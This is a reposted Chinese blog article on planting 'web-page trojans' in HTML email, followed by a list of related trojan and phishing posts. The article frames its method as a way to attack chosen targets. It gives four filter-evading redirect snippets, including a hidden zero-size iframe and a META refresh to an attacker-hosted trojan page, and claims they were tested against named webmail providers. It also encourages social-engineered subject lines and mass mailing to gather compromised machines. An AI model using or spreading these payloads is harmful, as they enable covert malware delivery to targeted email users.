邮件网页木马

网页嵌入式木马之我所见 几天前我中了一个木马,当时我很纳闷,我第一没有收过邮件,第二没有收过朋友从QQ里传来的文件,为什么我会中木马呢?于是查了一下有关资料,才发现网页也有嵌入的可能。究其原因,这是因为微软公司的在2000年发布的MIME/BASE64处理漏洞所引起的,不过这个漏洞只适用于IE5.5以下的版本的浏览器。那么MIME是什么呢?其实MIME是Multimedia Internet Mail Extension 阅读详情

大家肯定对网页木马 已经很熟悉了,但大 家可能对邮件网页木马还不是很熟悉。其实这个也许有些高手以前已经发现并使用很久了。但我一直未见网上及杂志上有此方面的内容。这里我就以技术共享的原则 跟大家谈谈邮件网页木马的思路及实现方法。

邮件网页木马的危害巨大,它能化被动为主动。目前网络 上流行的网页木马其实是很被动的,它需要被害者点击目标 网址。随着现在网民的安全 观念的增强,网民一 般不会轻易点击陌生的网址。但邮件网页木马就不一样了,你可以将电子邮件发送到你想要攻 击 的目标信箱。只要你根据社会工程学及心理学的知识,将邮件的标题看上去不明显像是垃圾邮件或广告,那么接收者肯定会 点击此邮件的。只要他点击了此邮件主题,看了信,哈哈,他就中招了!当然你也可以通过邮件群发器,这样的话,传播速率比普通的网页木马以及电子书木马不知 高多少呢!而且它有个最大的优点,那就是具有目标可指定性。它可以攻击你想要的指定用户。这一点是普通方法无法比拟的。

邮件网页木马其实 就是在发E-mail以HTML方式内嵌网页木马,使邮件本身成为一张网页木马。到这时你也许回大呼,我怎么没想到啊!呵呵,不怕做不到,只怕想不到啊。 其实有些技术本身并不难,但就是怕不往这方面想啊。我还是赶快转入正题吧,否则,坏柿子扔过来啦!闪!

聪明的你此时可能会说,邮件网页木 马岂不是很简单啊,只要在发邮件是选择以HTML方式发送,再将网页木马的源代码写入即可。事实上当然没这么简单,因为国内的绝大部分电子信箱都对其中一 些关键代码进行的屏蔽过滤。因而本文将重点研究怎样突破重围,在电子邮件中引入网页木马,达到我们的目的。

一般的网页木马都用到 javasccript,但绝大部分邮件系 统 都对<script>标记作了屏蔽。从而我们只能另辟新法。我们可以不直接将网页木马的代码写入邮件 中,因为如果写入的话,有关代码会被屏蔽,网页木马将失效。我们可以写入转向代码,使用户浏览此邮件时转向我们放在自己网站上的网页木马。当然,邮件网页 木马的难点就在转向代码。写转向代码要有讲究,因为写得不巧妙的话,代码将会被邮件系统屏蔽。

下面笔者来谈谈几种有效的可以在电子邮件中 引入网页木马的且没被邮件服务器 屏蔽 的转向代码。因为绝大部分邮件系统都对<script>标记作了屏蔽,所以为了转向代码有效,均不使用JS和VBS标记。

1. window.location 法,代码如下

<body nload="window.location='http://xxxxx';"></body>



2. 框架法,代码如下

<frameset cols="100%,*">

<frame. src="http://xxxxx" scrolling="auto">

</frameset>



其 中scrolling参数值得注意,合理使用可加强隐蔽性。Cols参数可根据自己的实际情况作更改。

3. META标志法,代码如下

<META. HTTP-EQUIV="Refresh" CONTENT="0;URL= http://xxxxx">



其中CONTENT后面的阿拉伯数字是代表过 几秒中钟转入目标网页。

4. iframe内帧法

<iframe. src="http://xxxxx" width="0" height="0" frameborder="0">



其中 width="0" height="0"是引入网页的大小尺寸,可以根据你的实际需要加以调整。其中的frameborder参数也很重要,如果使用的恰当的话,可以增强邮 件网页木马的隐蔽性。为了大家看的清楚,我将widt和height均设置的非零数值,转向的是网易的首页(如果转向的是放在自己网站上的网页木马,呵 呵......)。图1是设置frameborder=1的效果,图2是设置为frameborder=0的效果。

大家由上面两幅图即可 知道,如果设置为frameborder=1,邮件中可看见邮件服务器自动加带的页脚广告。而设置为frameborder=0,则如图2所示,它不像普 通的信件一样看见邮件服务器自动加带的广告。大家可根据具体情况选择frameborder参数来获得最好的伪装引入效果,使对方感觉不到他所浏览的邮件 是已经转向到你的网站上的网页木马.

上述代码笔者已经对国内的几乎所有电子信箱作了测试,如网易,搜狐,新浪,亿唐,21CN,TOM等 等。以上四种方法各有千秋。第一种方法的适应范围最小。比如网易、亿唐都屏蔽了它。但第2、3、4方法在国内的信箱测试中均通过。尤其第2、3种方法几乎 百试百灵。当然第4种方法也很经典,参数多,隐蔽性强。大家可根据不同的目标信箱选择最有效的转向引入代码。

现在只要大家会制作网页木马 (关于网页木马木马的制作方法,大家可以参见以往的黑防),拥有了性能优秀的后门程序或木马程序,再配合本文所讲的邮件木马引入技术的话,贪心的再来个邮 件群发,呵呵,你必将为所欲为,肉鸡成群。而且,这种方法具有攻击目标可指定性的优点!一场暴风雪即将来临!大家以后还是少在公开场合公布信箱哟!当然, 稳妥的措施是邮件服务器实行严格个代码过滤,用户将邮件查看方式设置为以文本方式查看!

后记:笔者顺便还对几个国外著名的邮 箱:hotmail以及Yahoo作了测试,发现它们过滤得都非常严格。上述的4种方法的代码都被过滤了。此时我深感国内邮件提供商与国外的差距。安全观 念的差距!但hotmail以及Yahoo并不是固若金汤。以色列网络安全 公司GreyMagic Software已经发现hotmail以及Yahoo邮箱也存在过滤不严的漏 洞 。我们可以用同步多媒体集成语言的(SMIL)的HTML+TIME技术来突破屏蔽,实现转向引入网页木马的目的。 庆幸的是此漏洞最近已经被hotmail以及Yahoo修补。但国内的几乎所有电子信箱均存在此漏洞。当然深爱钻研技术的你肯定会问,现在是否有针对 hotmail以及Yahoo邮箱的有效的转向引入代码。答案是肯定的!这个问题留给大家思考,大家可以向xml方向去发散,相信你一定会找到的!

自己动手做QQ木马----邮件发送篇 自己动手做QQ木马----邮件发送篇    以往各网站的EMail系统均是根据标准的SMTP协议编写的,现在为了更有效地抑制垃圾邮件的泛滥,国内各大免费邮箱提供商纷纷开始采用ESMTP的方式设计E-mail收发服务。发送邮件需要对用户的身份进行验证,如果帐号和密码有误,ESMTP服务器则拒绝发送该邮件返回553错误代码。通过对协议的分析我找到设计这样EMail的方法,我们可以用Visual 阅读详情

相关推荐

盗取网站账户密码和本地邮箱木马分析

发现了一种盗取浏览器保存的网站账户密码和本地邮箱的账号和密码的木马,这个木马主要通过使用Mail passView和webBrowserPassView两款查看账号密码的软件,通过两款外壳来对两个工具进行加密,然后进行注入,执行后发送到 黑客的服务器中。样本剖析该样本一共有两种外壳,两种外壳都是将核心文件解密出来 下图是解密出的核心文件,是个PE文件 核心文件是个VB编写的文件,且图标都是这个

u011636170的专栏 5168

一个邮件钓鱼木马的分析 (一)

已发表于本人专栏:  http://www.freebuf.com/column/142406.html 最近收到一个钓鱼木马邮件,内容形式如下:   邮件里有个链接,当点开链接后会下载一个doc文档,打开文档会发现有宏代码   经过一些列解密后悔执行shell执行宏命令,打印出这个信息出来后发现,原来执行了powershell命令   是从网

浪子_三少(邮箱:basketwill@qq.com) 1万+

邮箱密码破解软件(木马版)有教程

自从上次发了教程之后,有人问我用那些软件好... 真的感觉有点烦,现在我就给大家发个邮箱密码破解工具(木马版) 大家按照教程思路去做就行了..绝对能破解, 不能的话 大家可以来骂我!

邮件发送JS脚本传播敲诈者木马的分析报告

1.概述 安天威胁态势感知系统2015年12月2日捕获到有新的传播特点的敲诈者变种邮件,其不再采用直接发送二进制文件载荷的传播模式,而是以一个存放在压缩包中的JS脚本为先导。 安天追影分析小组对相关事件和样本进行了分析。该样本系TeslaCrypt的另一个变种TeslaCrypt 2.x,邮件附近是一个zip压缩文件,解压zip文件得到一个js文件,...

weixin_33862188的博客 486

COVID-与传统邮件僵尸网络家族

不同于其他邮件木马,Emotet 在获取和利用邮件地址资源上更进一步,它可以使用一个独立的模 块盗窃受害者主机上 Outlook 邮箱中的邮件地址,从而使用这些窃取到的邮件地址作为新的发件人。19 年起, NetWire 进入新一轮的爆发期,借助由鱼叉邮件和网盘组建的扩散网络广为传播。关于 COVID-19疫情的通告,伪装为 COVID-19新闻稿的附件则携带了 Emotet 木马程序,如果邮件接收者执行了该 Emotet 程序,该木马将 会下载包括隐私窃取、键盘记录、远程控制、挖矿等多类恶意程序并运行。

m0_73803866的博客 611

一次持续的邮件钓鱼攻击的简单溯源分析,看看是谁在钓鱼?

昨天连续收到两封欺骗邮件,分别是凌晨和下午,邮件的主题、内容都是一样的,主要 是发送人的信息不同,两份邮件截图如下所示:第一封:第二封:。因此,可认定为同一个组织/个人实施的邮件欺骗攻击。唉,怎么一不小心就成为攻击目标了,还一天两封,晕。今天在outlook直接点击访问,发现360已经会进行拦阻,显示如下:进行浏览器访问,登陆界面如下:欺骗用户填写邮箱的账户和密码。如果直接访问主页,发现显示的也是邮件登陆系统,界面如下:随便输入虚拟的邮箱账户和密码,显示“密码错误”,如下。

Innocence_0的博客 360

手机邮件打开一个html会中木马,小心,QQ邮件中的木马

小心,QQ邮件中的木马!文/图冰河洗剑最近,笔者的QQ邮箱中经常收到一些莫名其妙的邮件和贺卡,让你看一段视频了什么的,这只是垃圾邮件吗?每次笔者看到这些邮件,都毫不犹豫的将其删除,绝对不打开查看——因为,这些看似无关紧要的邮件中,很可能就夹带着木马!一、QQ邮箱漏洞与木马传播在新版的QQ邮箱中,存在着一个很严重的挂马漏洞,恶意攻击者可以在邮件中输入恶意代码,让其它用户中招后台下载运行木马。与一般...

weixin_32736961的博客 2238

各种网页木马挂马的代码

1、嵌入网页 以下是引用片段:  2、PHP网页挂马 以下是引用片段:   3、图片木马 以下是引用片段:   4、邮件木马 以下是引用片段:    5、flash木马 http://网页木马地址 插入木马地址 width=10 height=10", "GET" 宽度和高度,方式 后面的照添,更改木马地址就可以了。 6、做123.JS文件木马 以下是引用片段

jahn的专栏 3101

木马传播方法介绍

第一:网页木马制作。 本例中,大家可以下载一个“老丁网页木马生成器”。当然如果您看到这篇文章的时间比较晚,你也可以下载个别的。 很简单:把木马文件名字记录下来,例如mm.exe,打开木马生成器,输入http://你的域名/soft/mm.exe,再点生成,再把网页传到空间里,把木马文件mm.exe传到空间里的soft目录。别人看你的网页就会中马。 第...

weixin_34399060的博客 1134

网页钓鱼 + 邮件钓鱼的完整实现链路

邮件钓鱼攻击技术全流程演示:通过克隆目标网站、植入伪装木马,配合GoPhish工具完成钓鱼邮件投递。攻击者先复刻目标网页并替换下载链接为恶意程序,使用Restoraotor工具对木马进行图标伪装。接着配置SMTP发信服务器,制作高仿真邮件模板,设置目标用户组和钓鱼活动。最终实现邮件投递→诱导点击→下载木马的完整攻击链。该实验仅用于网络安全研究,严禁非法使用。

m0_56409644的博客 850

网络安全技术第六章——第三节木马的攻击与防治(中木马现象、木马病毒概念结构、木马实施攻击过程、配置传播运行连接木马、远程控制、木马伪装手段、更换图标改名换姓文件捆绑出错显示网页嫁衣自我销毁邮件附件)

木马的攻击与防治木马的攻击防治1.日常生活现象2.木马病毒的概念和由来3.木马病毒的结构4.木马实施攻击的过程5.木马的识别与防治方法总结个人防范技巧: 木马的攻击防治 1.日常生活现象 浏览器莫名其妙地自动打开了,并且进入某个网站 网上银行的钱不知不觉的被人盗走了 系统配置总是自动被更改 存储在计算机中的文件资料被泄露了 2.木马病毒的概念和由来 木马全称为“特洛伊木马”, 英文简称为Trojan,是来源于古希腊神话故事的一个词语。 木马病毒 在Internet上,木马(特洛伊木马)也称木马病毒,与一

ZSWAries的博客 6510

国内资深黑客详谈网页木马(5)

 四、网页木马的基本用法 理解了网页木马攻击的原理,以及常用的漏洞,就可以写出相关的利用代码。制作出网页木马,然后就是传播网页木马,目前网页木马的主要传播途径是:1.通过IM及时聊天软件传播将包含网页木马的地址(网址)通过QQ等聊天软件在网络中分发,一旦有用户访问了该网页,该网页就会在系统中自动下载并运行放置在网络上的木马。2.攻击知名网站,获得Webshell权限后,在网站中填加

瞎几把学 822

木马病毒的传播方式这么多,在你的日常冲浪中,木马病毒就进行了传播!

目录 传播方式 木马病毒的传播方式比较多,主要有: (1)利用下载进行传播,在下载的过程中进入程序,当下载完毕打开文件就将病毒植入到电脑中; (2)利用系统漏洞进行传播,当计算机存在漏洞,就成为木马病毒攻击的对象; (3)利用邮件进行传播,很多陌生邮件里面就掺杂了病毒种子,一旦邮件被打开,病毒就被激活; (4)利用远程连接进行传播; (5)利用网页进行传播,在浏览网页时会经常出现很多跳出来的页面,这种页面就是病毒驻扎的地方; (6)利用蠕虫病毒进行传播等。 传播方式 木...

weixin_44935794的博客 3578

你设备中的木马藏在哪里?为什么查杀困难?

在计算机领域中,木马是一类恶意程序,具有隐藏性和自发性等特点,可用于进行恶意攻击。本节主要从木马的概念和结构、伪装手段等方面来介绍木马

jklbnm12的博客 332

木马文件总结

文章目录木马-理论基础木马的植入方式远控木马的通信方式1.正向连接2.反向连接3.通信协议1. 图片马简单说明制作方法DVWA下图片马的利用Low Security LevelMedium Security Level2.msfvenom生成PDF马2.1 原理漏洞描述2.2 木马文件利用2.3 PDF文件利用2.4 PDF链接利用3.Cobalt Strike生成office宏木马3.1 引诱用户打开office宏3.2 使用CS生成office宏木马文件3.3 将宏payload添加至office文件3

个人博客 5916

自己动手做QQ木马----邮件发送篇 (转)

自己动手做QQ木马----邮件发送篇 (转)[@more@]自己动手做qq木马----邮件发送篇XML:namespace prefix = o ns = "urn:schemas-microsoft-com:Office:of...

csd3176的博客 832

通过邮件大规模传播窃密木马的事件分析

近期,兰云科技银河实验室近期通过“兰眼下一代威胁感知系统”发现一大批通过恶意邮件进行传播的PasswordStealer木马木马采用.net 编写,传播初期可以绕开绝大多数传统杀毒软件的检测,危害极大。该木马可以窃取包括浏览器、邮件客户端、FTP等软件的密码,传播多采用CVE-2017-11882和宏进行传播,最终将窃取的密码上传到指定的邮箱中。 1.传播分析 通过一段时间的监控发现,该...

Fly_鹏程万里 2155
上一篇: 雅虎邮箱蕴藏的全球风暴[转]
下一篇: 深入浅出之跨站攻击(XSS)
machack
博客等级 码龄17年 34粉丝 4原创
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值